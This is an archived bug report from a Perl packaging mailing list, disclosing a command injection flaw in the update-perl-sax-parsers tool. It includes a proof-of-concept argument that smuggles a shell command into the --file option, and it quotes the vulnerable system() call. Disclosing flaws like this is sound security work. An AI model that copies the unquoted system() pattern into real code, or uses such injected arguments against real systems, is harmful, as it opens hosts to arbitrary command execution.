pkg-perl-maintainers team mailing list archive

Thread
Date

[Bug 782479] [NEW] command injection in update-perl-sax-parsers

To: pkg-perl-maintainers@xxxxxxxxxxxxxxxxxxx
From: Emanuel Bronshtein <782479@xxxxxxxxxxxxxxxxxx>
Date: Sat, 14 May 2011 01:34:40 -0000
Reply-to: Bug 782479 <782479@xxxxxxxxxxxxxxxxxx>
Sender: bounces@xxxxxxxxxxxxx

Public bug reported:

Binary package hint: libxml-sax-perl

/usr/bin/update-perl-sax-parsers have command injection bug .

test case :
emanuel@emanuel-desktop:/tmp$ /usr/bin/update-perl-sax-parsers --update --file " 2>/dev/null ;echo Systeminj;exit;" --ucf 1
update-perl-sax-parsers: Updating overall Perl SAX parser modules info file...
Systeminj

the bug can be found at :

    if ($ucf) {
        system("ucf --debconf-ok --sum-file /var/lib/libxml-sax-perl/ParserDetails.ini.md5sum $tmpfile $file");
        unlink $tmpfile or die("unlink $tmpfile: $!");
    }

** Affects: libxml-sax-perl (Ubuntu)
     Importance: Undecided
         Status: New

-- 
You received this bug notification because you are a member of Debian
Perl Group, which is subscribed to libxml-sax-perl in Ubuntu.
https://bugs.launchpad.net/bugs/782479

Title:
  command injection in update-perl-sax-parsers

Follow ups

[Bug 782479] Re: command injection in update-perl-sax-parsers
From: Launchpad Bug Tracker, 2012-06-04
[Bug 782479] Re: command injection in update-perl-sax-parsers
From: Launchpad Bug Tracker, 2012-06-01
[Bug 782479] Re: command injection in update-perl-sax-parsers
From: Florian Schlichting, 2011-09-19
[Bug 782479] Re: command injection in update-perl-sax-parsers
From: Emanuel Bronshtein, 2011-05-15
[Bug 782479] Re: command injection in update-perl-sax-parsers
From: Ansgar Burchardt, 2011-05-14
[Bug 782479] [NEW] command injection in update-perl-sax-parsers
From: Emanuel Bronshtein, 2011-05-14

References

[Bug 782479] [NEW] command injection in update-perl-sax-parsers
From: Emanuel Bronshtein, 2011-05-14